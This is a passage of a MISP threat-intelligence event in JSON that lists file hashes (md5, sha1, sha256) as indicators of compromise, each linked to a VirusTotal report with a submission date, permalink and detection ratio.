"deleted": false,
"disable_correlation": true,
"object_relation": "detection-ratio",
"timestamp": "1556355076",
"to_ids": false,
"type": "text",
"uuid": "eb4ad240-1687-479f-9ae9-55f16edf0601",
"value": "36/57"
}
]
},
{
"comment": "",
"deleted": false,
"description": "File object describing a file with meta-information",
"meta-category": "file",
"name": "file",
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
"template_version": "15",
"timestamp": "1556355093",
"uuid": "56c96c2d-6b60-480a-a6dd-392718a6b188",
"ObjectReference": [
{
"comment": "",
"object_uuid": "56c96c2d-6b60-480a-a6dd-392718a6b188",
"referenced_uuid": "b5470b5b-e9e6-4ed2-b7c3-108f1e42b227",
"relationship_type": "analysed-with",
"timestamp": "1556355096",
"uuid": "5cc41818-6564-4e23-ba8a-4c0b02de0b81"
}
],
"Attribute": [
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1556355076",
"to_ids": true,
"type": "md5",
"uuid": "79ac497f-101f-4fd9-ace8-a2652857be3e",
"value": "3a3f7b2c2bea6a70ad62657b8613b1d1"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1556355076",
"to_ids": true,
"type": "sha1",
"uuid": "2191451a-62f1-42dc-831e-0df40000465d",
"value": "ca94cde61c2b1640a420c61d2cb9c892b81a30d1"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1556355076",
"to_ids": true,
"type": "sha256",
"uuid": "e9aca1fc-4843-4c31-90d6-34b75852895f",
"value": "976e948ccec98ffd36115d0240c2a438dccd4e15d220284e6356e3fcb0f2548c"
}
]
},
{
"comment": "",
"deleted": false,
"description": "VirusTotal report",
"meta-category": "misc",
"name": "virustotal-report",
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
"template_version": "2",
"timestamp": "1556355093",
"uuid": "b5470b5b-e9e6-4ed2-b7c3-108f1e42b227",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "last-submission",
"timestamp": "1556355076",
"to_ids": false,
"type": "datetime",
"uuid": "605f81fb-6364-412b-a106-39603b9c4e59",
"value": "2019-04-07T17:10:08"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "permalink",
"timestamp": "1556355076",
"to_ids": false,
"type": "link",
"uuid": "5990199c-faff-4903-808a-bdbba9f7276a",
"value": "https://www.virustotal.com/file/976e948ccec98ffd36115d0240c2a438dccd4e15d220284e6356e3fcb0f2548c/analysis/1554657008/"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "detection-ratio",
"timestamp": "1556355076",
"to_ids": false,
"type": "text",
"uuid": "f678d42e-bf7a-46c0-af36-7e8b82a6f280",
"value": "36/56"
}
]
},
{
"comment": "",
"deleted": false,
"description": "File object describing a file with meta-information",
"meta-category": "file",
"name": "file",
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
"template_version": "15",
"timestamp": "1556355093",
"uuid": "548d726e-92df-4311-b2d7-ea098d9a2570",
"ObjectReference": [
{
"comment": "",
"object_uuid": "548d726e-92df-4311-b2d7-ea098d9a2570",
"referenced_uuid": "d2a962b8-e9f1-4db3-a4ab-cc399560f5cd",
"relationship_type": "analysed-with",
"timestamp": "1556355096",
"uuid": "5cc41818-2b4c-4582-af93-4b1002de0b81"
}
],
"Attribute": [
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1556355076",
"to_ids": true,
"type": "md5",
"uuid": "dced0977-9785-4cfd-8995-243b3df48320",
"value": "fad9b9a909688f800606c2148b4d0880"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1556355076",
"to_ids": true,
"type": "sha1",
"uuid": "f42ee720-2c78-46a7-9c94-94ccddc0810e",
"value": "ee44b722df537d53a3e59db178e2be57d7f8e985"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1556355076",
"to_ids": true,
"type": "sha256",
"uuid": "85f40f04-bfc0-404b-8acb-d37974a6b0a4",
"value": "62997b5ecc8bb785f16803cdd04d2b4209476e457d9a46cbb1f7fae0a6a8108d"
}
]
},
{
"comment": "",
"deleted": false,
"description": "VirusTotal report",
"meta-category": "misc",
"name": "virustotal-report",
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
"template_version": "2",
"timestamp": "1556355094",
"uuid": "d2a962b8-e9f1-4db3-a4ab-cc399560f5cd",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "last-submission",
"timestamp": "1556355076",
"to_ids": false,
"type": "datetime",
"uuid": "a8e523dd-5dd6-466e-86ce-5b009edd7294",
"value": "2018-12-23T16:55:04"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "permalink",
"timestamp": "1556355076",
"to_ids": false,
"type": "link",
"uuid": "ce52ccac-75fd-4d28-8300-23b0f0c2682d",
"value": "https://www.virustotal.com/file/62997b5ecc8bb785f16803cdd04d2b4209476e457d9a46cbb1f7fae0a6a8108d/analysis/1545584104/"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "detection-ratio",
"timestamp": "1556355076",
"to_ids": false,
"type": "text",
"uuid": "dfb31056-0eac-493e-a0cd-66b3ed501c0c",
"value": "26/57"
}
]
},
{
"comment": "",
"deleted": false,
"description": "File object describing a file with meta-information",
"meta-category": "file",
"name": "file",
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
"template_version": "15",
"timestamp": "1556355094",
"uuid": "06546ec0-783e-40a7-a681-d2d25f245cf8",
"ObjectReference": [
{
"comment": "",
"object_uuid": "06546ec0-783e-40a7-a681-d2d25f245cf8",
"referenced_uuid": "5473bd03-6e2e-435d-b979-cca55055af85",
"relationship_type": "analysed-with",
"timestamp": "1556355096",
"uuid": "5cc41818-e6a8-4b52-a9c3-434f02de0b81"
}
],
"Attribute": [
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1556355076",
"to_ids": true,
"type": "md5",
"uuid": "2a08c724-0a62-43b6-a0c8-e683cd72e372",
"value": "f0cccfa07427442b472a15232765a2eb"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1556355076",
"to_ids": true,
"type": "sha1",
"uuid": "fad14535-f8fb-4ff8-bceb-c550a1186f85",
"value": "6cb397aab13cdcbf0c77aea28431d81b036648ad"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1556355076",
"to_ids": true,
"type": "sha256",
"uuid": "275c6417-75b4-476b-8fa7-b0fa6e6a555b",
"value": "31784de70d7b55b2ee48a9ae359f7c67c82fb9a814279e0944a9dee01ed3f756"
}
]
},
{
"comment": "",
"deleted": false,
"description": "VirusTotal report",
"meta-category": "misc",
"name": "virustotal-report",
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
"template_version": "2",
"timestamp": "1556355094",
"uuid": "5473bd03-6e2e-435d-b979-cca55055af85",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "last-submission",
"timestamp": "1556355076",
"to_ids": false,
"type": "datetime",
"uuid": "e04d799d-8aaf-4a26-88a6-8836e6095eae",
"value": "2019-04-07T05:08:51"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "permalink",
"timestamp": "1556355076",
"to_ids": false,
"type": "link",
"uuid": "d9a1cabf-9dfb-4064-a87b-36e6bf32137f",
"value": "https://www.virustotal.com/file/31784de70d7b55b2ee48a9ae359f7c67c82fb9a814279e0944a9dee01ed3f756/analysis/1554613731/"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "detection-ratio",
"timestamp": "1556355076",
"to_ids": false,
"type": "text",
"uuid": "41d13690-0b80-401c-bff5-a3a4142fced8",
"value": "34/56"
}
]
},
{
"comment": "",
"deleted": false,
"description": "File object describing a file with meta-information",
"meta-category": "file",
"name": "file",
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
"template_version": "15",
"timestamp": "1556355094",
"uuid": "2f932e33-d889-4470-9aca-8ffd5769e055",
"ObjectReference": [
{
"comment": "",
"object_uuid": "2f932e33-d889-4470-9aca-8ffd5769e055",
"referenced_uuid": "66a53076-8934-43d7-b983-ab73ddd29d99",
"relationship_type": "analysed-with",
"timestamp": "1556355096",
"uuid": "5cc41818-24e0-4f30-afd3-48be02de0b81"
}
],
"Attribute": [
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1556355076",
"to_ids": true,
"type": "md5",
"uuid": "0cd432b8-7fe1-49b8-9898-03722b94b8de",
"value": "dccb186234326d4bff449d4416ff6ce4"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1556355076",
"to_ids": true,
"type": "sha1",
"uuid": "581bbd4b-b27a-436a-a84a-6f147701df1e",
"value": "a787e2e2f2bcfef92aa5032a67f3e6efcd706cb2"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1556355076",
"to_ids": true,
"type": "sha256",
"uuid": "3fa54938-bbaf-4732-9e41-f1d49559710c",
"value": "f031d926d80805795c20d1a7b280759d1393e736a85f7fd2e02d2088f2fb0221"
}
]
},
{
"comment": "",
"deleted": false,
"description": "VirusTotal report",
"meta-category": "misc",
"name": "virustotal-report",
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
"template_version": "2",
"timestamp": "1556355095",
"uuid": "66a53076-8934-43d7-b983-ab73ddd29d99",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "last-submission",
"timestamp": "1556355076",
"to_ids": false,
"type": "datetime",
"uuid": "9075c263-e538-4257-af4a-94d66a3923da",
"value": "2019-04-07T05:08:46"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "permalink",
"timestamp": "1556355076",
"to_ids": false,
"type": "link",
"uuid": "f433ead2-68ba-47c2-a043-af1ae435ca12",
"value": "https://www.virustotal.com/file/f031d926d80805795c20d1a7b280759d1393e736a85f7fd2e02d2088f2fb0221/analysis/1554613726/"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "detection-ratio",
"timestamp": "1556355076",
"to_ids": false,
"type": "text",
"uuid": "ef17cbe3-8b76-4c29-9210-248ede7d0e42",
"value": "36/55"
}
]
},
{
"comment": "",
"deleted": false,
"description": "File object describing a file with meta-information",
"meta-category": "file",
"name": "file",
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
"template_version": "15",
"timestamp": "1556355095",
"uuid": "952c0e2d-e595-4f12-a5d4-25ec983c91b6",
"ObjectReference": [
{
"comment": "",
"object_uuid": "952c0e2d-e595-4f12-a5d4-25ec983c91b6",
"referenced_uuid": "d4872fd8-7dc8-47d3-85e7-6e5aebe63db6",
"relationship_type": "analysed-with",
"timestamp": "1556355096",
"uuid": "5cc41818-1688-4aa0-9e8e-428c02de0b81"
}
],
"Attribute": [
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1556355076",
"to_ids": true,
"type": "md5",
"uuid": "7b1f1da1-ffe6-4d49-9957-f84457cac77f",
"value": "b94b6857ed382b66cdfbead83480ee15"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1556355076",
"to_ids": true,
"type": "sha1",
"uuid": "fd6d3582-48e3-4191-8643-b72fd52eab74",
"value": "b22e1b7bf6de3fb7572b26c10300309b04efb1b8"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1556355076",
"to_ids": true,
"type": "sha256",
"uuid": "6e7ff56c-517b-40b3-9c27-bf128f5b63e3",
"value": "fd43c0abfaa6e6203e24bdb015613801f4a23894aba9586b0bdf1e70736883e5"
}
]
},
{
"comment": "",
"deleted": false,
"description": "VirusTotal report",
"meta-category": "misc",
"name": "virustotal-report",
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
"template_version": "2",
"timestamp": "1556355095",
"uuid": "d4872fd8-7dc8-47d3-85e7-6e5aebe63db6",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "last-submission",
"timestamp": "1556355076",
"to_ids": false,
"type": "datetime",
"uuid": "99e029db-2803-42d1-97b7-cdd070ac880b",
"value": "2019-04-14T08:40:00"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "permalink",
"timestamp": "1556355076",
"to_ids": false,
"type": "link",
"uuid": "82dfb261-8353-453a-8fc5-3ec3f9129822",
"value": "https://www.virustotal.com/file/fd43c0abfaa6e6203e24bdb015613801f4a23894aba9586b0bdf1e70736883e5/analysis/1555231200/"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "detection-ratio",
"timestamp": "1556355076",
"to_ids": false,
"type": "text",
"uuid": "9b8befa3-84b0-4042-8ddd-86b454ceae2a",
"value": "36/59"
}
]
},
{
"comment": "",
"deleted": false,
"description": "File object describing a file with meta-information",
"meta-category": "file",
"name": "file",
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
"template_version": "15",
"timestamp": "1556355095",
"uuid": "1823da6d-442b-46cf-806d-aac97de195a4",
"ObjectReference": [
{
"comment": "",
"object_uuid": "1823da6d-442b-46cf-806d-aac97de195a4",
"referenced_uuid": "b5d7ba31-66eb-4bc9-a2c8-5140d36761b8",
"relationship_type": "analysed-with",
"timestamp": "1556355096",
"uuid": "5cc41818-a3cc-4b0f-a3ef-4c1302de0b81"
}
],
"Attribute": [
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1556355076",
"to_ids": true,
"type": "md5",
"uuid": "28708c12-f4c7-4de5-b038-e274224d52da",
"value": "b83113015a0f817c4d68659d9a1e370a"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1556355076",
"to_ids": true,
"type": "sha1",
"uuid": "5a5c76ee-7d95-452f-a5b2-2ff5dbdd673e",
"value": "ec9c669f2b8c13e94a7ba7c57ccf163c8b8cf060"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1556355076",
"to_ids": true,
"type": "sha256",
"uuid": "70737086-ac37-4fea-a227-f5ce2ff25e22",
"value": "3549fca31abf602a78f645d3406ad075e02c7ea9a6aa9cec243ba6cb58b5e39f"
}
]
},
{
"comment": "",
"deleted": false,
"description": "VirusTotal report",
"meta-category": "misc",
"name": "virustotal-report",
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
"template_version": "2",
"timestamp": "1556355095",
"uuid": "b5d7ba31-66eb-4bc9-a2c8-5140d36761b8",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "last-submission",
"timestamp": "1556355076",
"to_ids": false,
"type": "datetime",
"uuid": "211d0bff-f499-4d9f-9b51-f35b3784bc4b",
"value": "2019-03-15T21:23:14"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "permalink",
"timestamp": "1556355076",
"to_ids": false,
"type": "link",
"uuid": "bd823c0f-8191-4313-a833-5193229cf518",
"value": "https://www.virustotal.com/file/3549fca31abf602a78f645d3406ad075e02c7ea9a6aa9cec243ba6cb58b5e39f/analysis/1552684994/"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "detection-ratio",
"timestamp": "1556355076",
"to_ids": false,
"type": "text",
"uuid": "92028634-4567-407b-9470-2c3b3295062c",
"value": "6/55"
}
]
}
]
}
}